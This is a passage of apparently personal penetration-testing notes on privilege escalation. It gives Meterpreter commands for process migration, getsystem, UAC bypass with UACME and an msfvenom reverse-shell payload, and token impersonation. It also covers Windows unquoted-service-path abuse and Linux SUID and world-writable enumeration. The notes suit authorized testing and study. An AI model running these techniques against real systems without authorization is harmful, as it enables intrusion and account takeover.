For example, when you have a Meterpreter session, sometime it can be killed easily (e.g. browser). In this case, you have to migrate the Meterpreter session to another process. Meterpreter has a function to do this automatically:
run post/windows/manage/migrate
Or manually:
ps
migrate <target_pid>
Windows Privilege Escalation
getsystem
For Windows with Meterpreter, the easiest way is of course getsystem.
getsystem
# If you want to be specific on using which technique:
getsystem -t <option>
However, if you are not admin, getsystem will probably fail. To check current privilege:
run post/windows/gather/win_privs
Bypass UAC
If win_privsshows UAC enabled, we may use some modules in Metasploit. For example, search for bypassuac:
search bypassuac
Also, there is a tool UACME:
After compiling executables, we can use the upload function in Meterpreter to upload Akagi and ReverseShell Payload (msfvenom). After that, create a multi handler referencing to the msfvenom payload. Then execute:
shell
Akagi64.exe <Keys> <msfvenom_payload>
Meterpreter Incognito Extension
Incognito is used to impersonate other valid user tokens on that machine.
In Meterpreter shell:
use incognito
To check available tokens:
list_tokens -u
To impersonate:
impersonate_token <delegation_token>
Unquoted Service Paths
Abuse the way that Windows searches for executables belonging to a service.
For example, in the above case, we can put an executable to one of the following locations and the service will use this executable!
C:\Program.exe
C:\Program Files (x86)\Canon\IJ.exe
To check if the system has unquoted services, in Windows cmd:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Or use scto query a specific service
sc qc <service_name>
Or Metasploit exploit ...
use exploit/windows/local/trusted_service_path
An other problem is that we may not have the permission to upload a file to the folder. To check:
icacls <path>
Again another problem is that the session could be unstable. A trick is to migrate to another process when handler gets a callback!
use multi/handler
<snip>
set AutoRunScript migrate -n svchost.exe
HackTricks Check List
Find phrases in files
Find a phrase in the files in the current directory
find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
Unmounted system?
cat /etc/fstab
Sticky bits, SUID / GUID?
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
Any "problem" files? Word-writeable, "nobody" files
